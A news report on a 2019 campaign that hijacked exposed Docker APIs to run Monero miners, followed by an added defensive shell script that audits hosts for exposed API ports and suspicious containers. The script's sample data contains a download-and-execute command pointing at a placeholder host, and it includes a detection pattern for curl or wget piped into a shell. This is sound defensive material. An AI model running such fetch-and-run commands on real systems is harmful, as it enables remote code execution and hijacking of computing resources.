A group of hackers has launched a new cryptojacking campaign on November 24, scanning as many as 59,000 IP networks to find Docker platforms that have API endpoints exposed online.
Hackers Mass-Scanning Web for Docker Platforms to Mine Cryptocurrencies https://t.co/2znBAxphwD A new hacking campaign is targeting Docker platforms that have API endpoints exposed online to mine Monero https://t.co/dUtxFPgeyq News pic.twitter.com/GHXrlZhpLp — CryptoPost (@crypto_PST) November 27, 2019
On November 26, ZDNet, a business technology publication, reported that the campaign targets vulnerable Docker instances in order to deploy crypto-malware that mines Monero (XMR) to generate funds for the hacking group.
The mass scanning was first detected by Bad Packets LLC, an American internet security firm, on November 25.
Large uptick in Docker targeted scanning activity started around midnight UTC on 2019-11-24. Payload script https://t.co/q047bRPUyj has zero detections on VirusTotal (https://t.co/AtCT4qp6qt) despite clear malicious activity. Archived copy here: https://t.co/pwpVhn4MM9 pic.twitter.com/nDOfO2bKD5 — Bad Packets Report (@bad_packets) November 25, 2019
However, Troy Mursch, the Chief Research Officer and Co-founder of Bad Packets LLC, said that exploit activity targeting exposed Docker instances is not new and happens quite often.
Docker is a developer tool designed to simplify processes of creating, deploying and running software by using containers. Containers allow developers to package up an application with all of the required parts like libraries and other dependencies and deliver it as one package.
Reportedly, a group of hackers is now scanning the internet to search for IP networks with exposed Docker platforms to mine crypto. Hackers using Docker pl…Read more: https://t.co/I19GctC9zr — webnow (@webnowcompany) November 27, 2019
Mursch, who reportedly discovered the campaign, said that once the hacking group identifies an exposed host, the attackers use the API endpoint to start an Alpine Linux container that runs a command to download and execute a Bash script from the attackers’ server. That script then reportedly installs a “classic XMRig cryptocurrency miner.”
According to Mursch, the hackers mined 14.82 XMR in the two days the Docker-targeting campaign was active, worth $835 at press time.
To avoid falling victim to the campaign, Mursch recommends that users who run Docker instances immediately check whether they are exposing their API endpoints on the internet, close the ports, and terminate any running containers they do not recognize.
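The two checks Mursch recommends, and the container pattern the campaign uses, can be turned into a small host audit. The script below is an added example written for this page; it is not code from Bad Packets, ZDNet or the Docker project. It assumes the Docker daemon on the host is either exposed on the conventional TCP ports 2375 (plain) or 2376 (TLS), that `ss` and `docker` are available for the live run, and that the operator can list the container images they expect to be running. The sample `ss` and `docker ps` lines embedded in it are constructed, and `example.invalid` is a placeholder hostname. The download-piped-to-shell match is a heuristic for the chain described above (a container whose command fetches a script and runs it), so anything it flags is printed for review rather than stopped automatically.

```shell
#!/bin/sh
# Added example (not from the article, Bad Packets or Docker): audit a Docker
# host for an exposed API endpoint and for running containers that do not
# match what the operator expects. Both checks read command output from
# stdin so they can be exercised offline with constructed sample lines.

TAB="$(printf '\t')"

# Check 1: is the Docker daemon listening on a remotely reachable TCP port?
# Input: lines in the format of `ss -Hltn` (listening TCP sockets, no header):
#   State Recv-Q Send-Q Local-Address:Port Peer-Address:Port
# Prints every listener on port 2375 or 2376 that is bound to something other
# than loopback. Returns 0 (true) when at least one such listener was found.
docker_api_exposed() {
    exposed=1
    while read -r state recvq sendq laddr peer rest; do
        [ -n "$laddr" ] || continue
        case "$laddr" in
            *:2375|*:2376) ;;          # Docker API ports
            *) continue ;;             # any other service: not our concern here
        esac
        case "$laddr" in
            127.*|"[::1]:"*) continue ;;   # loopback only: not reachable remotely
        esac
        echo "EXPOSED docker API listener: $laddr"
        exposed=0
    done
    return $exposed
}

# Check 2: flag running containers the operator should review.
# Input: lines from
#   docker ps --no-trunc --format '{{.ID}}\t{{.Image}}\t{{.Command}}'
# Arguments: image names the operator recognises (exact match).
# A container is flagged when its image is not in that list, or when its
# command fetches remote content with curl/wget and pipes it into a shell,
# the pattern the campaign above uses. Prints one REVIEW line per flagged
# container and returns 0 (true) when anything was flagged.
flag_unrecognized_containers() {
    flagged=1
    while IFS="$TAB" read -r id image cmd; do
        [ -n "$id" ] || continue
        reason=""
        known=0
        for k in "$@"; do
            [ "$image" = "$k" ] && known=1
        done
        [ "$known" -eq 1 ] || reason="unrecognized-image"
        case "$cmd" in
            *curl*"|"*sh*|*wget*"|"*sh*)
                reason="${reason:+$reason,}pipes-download-to-shell" ;;
        esac
        [ -n "$reason" ] || continue
        echo "REVIEW $id image=$image reason=$reason"
        flagged=0
    done
    return $flagged
}

# Constructed sample input (not captured from any real host): what `ss -Hltn`
# might print when the daemon was bound to all interfaces on 2375.
SAMPLE_SS='LISTEN 0 4096 0.0.0.0:2375 0.0.0.0:*
LISTEN 0 128 127.0.0.1:2376 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*'

# Constructed sample `docker ps` output: one expected web container and one
# Alpine container whose command pulls a script into a shell.
SAMPLE_PS="$(printf '%s\t%s\t%s\n' \
    c1a2b3 nginx:1.17 'nginx -g daemon off;' \
    d4e5f6 alpine '/bin/sh -c "wget -qO- http://example.invalid/a.sh | sh"')"

# Run both checks on the samples, then on this host if the tools are present.
# Pass the images you expect to be running as arguments to the script.
main() {
    echo "--- constructed sample ---"
    printf '%s\n' "$SAMPLE_SS" | docker_api_exposed || echo "no exposed API listener"
    printf '%s\n' "$SAMPLE_PS" | flag_unrecognized_containers nginx:1.17 \
        || echo "no container to review"
    if command -v ss >/dev/null 2>&1 && command -v docker >/dev/null 2>&1; then
        echo "--- this host ---"
        ss -Hltn | docker_api_exposed || echo "no exposed API listener"
        docker ps --no-trunc --format '{{.ID}}\t{{.Image}}\t{{.Command}}' \
            | flag_unrecognized_containers "$@" || echo "no container to review"
    fi
}
main "$@"
```

Run it as `sh audit-docker.sh nginx:1.17 redis:5` with the images you expect listed as arguments; a REVIEW line for a container you did not start is the cue to inspect it and stop it, and an EXPOSED line means the daemon should be rebound to a Unix socket or to loopback and the port closed at the firewall. The match on `curl`/`wget` piped into `sh` will also hit legitimate bootstrap commands, which is why the script reports rather than kills.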